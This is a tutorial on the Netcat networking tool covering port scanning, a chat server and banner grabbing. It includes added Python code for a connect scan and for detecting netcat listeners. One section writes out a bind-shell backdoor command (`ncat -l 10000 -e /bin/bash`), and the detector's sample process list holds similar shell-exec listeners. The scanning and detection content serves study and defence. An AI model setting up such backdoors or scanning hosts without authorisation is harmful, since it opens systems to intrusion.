Netcat is a versatile networking tool that can be used for port scanning, port redirection, listening for incoming connections, and creating remote connections. It allows creating a simple command line chat server by running nc in listen mode on one system and connecting to it from another. Netcat can also identify services running on specific ports by obtaining port banners, and has been used by hackers to create backdoors by launching a shell on a listened port.
2. Netcat
• Netcat (or nc for short) is a simple yet powerful networking command-line tool used for performing any operation in Linux related to TCP, UDP, or UNIX-domain sockets.
• Netcat can be used for port scanning, port redirection, and as a port listener (for incoming connections); it can also open remote connections and do many other things. Besides, it can be used as a backdoor to gain access to a target server.
3. Port Scanning
Netcat can be used for port scanning: to learn which ports are open and which services are running on a target machine. It can scan a single port, several listed ports, or a range of ports.
Here is an example. The -z option tells nc to scan only for listening daemons, without actually sending any data to them. The -v option enables verbose mode, and -w sets a timeout in seconds after which a connection attempt that cannot be established is abandoned.
$ nc -v -w 2 -z 192.168.56.1 22        # scan a single port
OR
$ nc -v -w 2 -z 192.168.56.1 22 80     # scan multiple ports
OR
$ nc -v -w 2 -z 192.168.56.1 20-25     # scan a range of ports
4. Create a Command Line Chat Server
You can also use Netcat to create a simple command-line messaging server instantly. As in the previous usage example, nc must be installed on both systems used for the chat room.
On one system, run the following command to create the chat server listening on port 5000.
$ nc -l -vv -p 5000
On the other system, run the following command to connect to the machine where the messaging server is running and start the chat session.
$ nc 192.168.56.1 5000
5. Find a Service Running on a Port
You can also use Netcat to obtain port banners. In this case, it will tell you what service is running behind a certain port. For example, to learn what type of service is running behind port 22 on a specific server, run the following command (replace 192.168.56.110 with the target server's IP address). The -n flag disables DNS and service-name lookups. Note that services such as SSH send their banner as soon as the connection opens, while others (HTTP, for instance) only answer after the client has sent a request.
$ nc -v -n 192.168.56.110 22
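The port scan from section 3 and the banner grab from section 5, re-implemented in Python as an added example (this is not code from the original page) so the mechanics behind `nc -z -w` and `nc -v -n host port` are visible: a TCP connect scan just tries connect() and reports success or failure, and banner grabbing just reads whatever the service says first. To run offline, the block starts a throwaway local listener that greets with a constructed banner; the listener, the banner text and the port-spec parser are assumptions made for this example. The scanner accepts the same port specs as nc ("22", "22 80", "20-25").

```python
"""Added example: what `nc -z -w <t>` (connect scan) and `nc -v -n host port`
(banner grab) do under the hood, run against an in-process test listener."""
import socket
import threading
from typing import Dict, List

# Constructed banner for the local test service (not from a real host);
# real SSH servers send a line of this shape as soon as the connection opens.
TEST_BANNER = b"SSH-2.0-ExampleTestService_1.0\r\n"


def parse_port_spec(spec: str) -> List[int]:
    """Expand an nc-style port spec: "22", "22 80", or "20-25" (mixing allowed)."""
    ports: List[int] = []
    for token in spec.split():
        if "-" in token:
            lo, hi = (int(x) for x in token.split("-", 1))
            if lo > hi or not (0 < lo and hi < 65536):
                raise ValueError(f"bad port range: {token}")
            ports.extend(range(lo, hi + 1))
        else:
            p = int(token)
            if not 0 < p < 65536:
                raise ValueError(f"bad port: {token}")
            ports.append(p)
    return ports


def connect_scan(host: str, spec: str, timeout: float = 2.0) -> Dict[int, bool]:
    """Equivalent of `nc -z -w timeout host <spec>`: True means the handshake completed."""
    results: Dict[int, bool] = {}
    for port in parse_port_spec(spec):
        try:
            with socket.create_connection((host, port), timeout=timeout):
                results[port] = True          # accepted: something is listening
        except OSError:                       # refused, timed out or unreachable
            results[port] = False
    return results


def grab_banner(host: str, port: int, timeout: float = 2.0, max_bytes: int = 256) -> str:
    """Equivalent of `nc -v -n host port` followed by reading the first bytes sent.

    SSH, SMTP and FTP talk first; HTTP does not, so an empty string here means
    "connected, but the service is waiting for the client to speak".
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            data = s.recv(max_bytes)
        except socket.timeout:
            data = b""
    return data.decode("ascii", errors="replace").strip()


def start_test_listener(banner: bytes = TEST_BANNER) -> int:
    """Start a local service that greets every client with `banner`; return its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))               # port 0: let the OS pick a free one
    srv.listen(5)

    def serve() -> None:
        with srv:
            while True:
                try:
                    conn, _ = srv.accept()
                except OSError:
                    return
                with conn:
                    try:
                        conn.sendall(banner)
                    except OSError:          # scanner closed before we could send
                        pass

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo() -> dict:
    """Scan a small range around the test listener, then grab its banner."""
    port = start_test_listener()
    scan = connect_scan("127.0.0.1", f"{port - 1}-{port + 1}", timeout=1.0)
    return {"port": port, "scan": scan, "banner": grab_banner("127.0.0.1", port)}


if __name__ == "__main__":
    r = demo()
    for p, is_open in r["scan"].items():
        print(f"127.0.0.1 {p}: {'open' if is_open else 'closed'}")
    print("banner:", r["banner"])
```

Running the block prints one line per scanned port, exactly the open/closed verdict `nc -z -v` would give, followed by the banner; point `connect_scan` and `grab_banner` at a real host and port to reproduce the nc commands above.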
6. Create a Backdoor via nc
The nc command can also be used to create a backdoor into your systems, and this technique is actually used by hackers a lot. To create a backdoor, the command is:
$ ncat -l 10000 -e /bin/bash
The -e flag attaches a bash shell to port 10000. Now a client can connect to port 10000 on the server and will have complete access to the system via bash.
$ ncat 192.168.1.100 10000
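Because a listener of this kind looks like an ordinary nc process, a defender's first check is the process inventory. The following is an added example (not code from the original page) that parses `ps -eo pid,user,args` output and flags any nc/ncat/netcat invocation that both listens (-l, --listen, or a combined short flag such as -lvnp) and executes a program (-e, -c, --exec, --sh-exec, --lua-exec); it goes slightly beyond the page's single `-e /bin/bash` form by covering ncat's long-form exec options. The sample process listing and the binary/option sets are constructed for this example.

```python
"""Added example: flag netcat-family listeners that hand a program (usually a
shell) to whoever connects, from a `ps -eo pid,user,args` style listing."""
import shlex
from typing import Dict, List

# Constructed sample process listing (not real system output).
SAMPLE_PS = """\
  PID USER     COMMAND
  412 root     /usr/sbin/sshd -D
  915 www-data nginx: worker process
 1337 nobody   ncat -l 10000 -e /bin/bash
 1402 alice    nc -lvnp 4444 -e /bin/sh
 1511 bob      nc -l -vv -p 5000
 1600 carol    /usr/bin/ncat --listen 8080 --sh-exec "cat /etc/motd"
 1702 erin     nc -v -w 2 -z 192.168.56.1 22
"""

# Binary names the netcat family is installed under (assumed set for the example).
NC_BINARIES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
# Options that make nc/ncat run a program for each accepted connection.
NC_EXEC_OPTS = {"-e", "--exec", "-c", "--sh-exec", "--lua-exec"}


def parse_ps(text: str) -> List[Dict[str, str]]:
    """Turn `ps -eo pid,user,args` output into dicts, skipping the header line."""
    procs: List[Dict[str, str]] = []
    for line in text.splitlines():
        parts = line.split(None, 2)           # pid, user, rest-of-line
        if len(parts) < 3 or not parts[0].isdigit():
            continue
        procs.append({"pid": parts[0], "user": parts[1], "args": parts[2]})
    return procs


def _is_listen_flag(arg: str) -> bool:
    """-l, --listen, or a bundled short option group containing l (e.g. -lvnp)."""
    if arg == "--listen":
        return True
    return arg.startswith("-") and not arg.startswith("--") and "l" in arg[1:]


def _is_exec_flag(arg: str) -> bool:
    """-e/--exec/-c/--sh-exec/--lua-exec, including the --opt=value spelling."""
    return arg in NC_EXEC_OPTS or arg.split("=", 1)[0] in NC_EXEC_OPTS


def is_shell_backdoor(cmdline: str) -> bool:
    """True when a netcat-family command both listens and executes a program."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:                        # unbalanced quotes: leave for a human
        return False
    if not argv or argv[0].rsplit("/", 1)[-1] not in NC_BINARIES:
        return False
    opts = argv[1:]
    return any(_is_listen_flag(a) for a in opts) and any(_is_exec_flag(a) for a in opts)


def find_backdoor_listeners(ps_text: str) -> List[Dict[str, str]]:
    """Return the processes in `ps_text` that match the listen-and-exec pattern."""
    return [p for p in parse_ps(ps_text) if is_shell_backdoor(p["args"])]


if __name__ == "__main__":
    for hit in find_backdoor_listeners(SAMPLE_PS):
        print(f"ALERT pid={hit['pid']} user={hit['user']}: {hit['args']}")
```

Pipe live output into it with `ps -eo pid,user,args | python3 this_script.py` after swapping `SAMPLE_PS` for `sys.stdin.read()`. The plain chat listener (`nc -l -vv -p 5000`) and the scan command are not flagged, only listeners that also execute something. On the mitigation side, note that Debian's default nc.openbsd is built without -e at all; an unexpected ncat or nc.traditional binary on a host is itself worth a look.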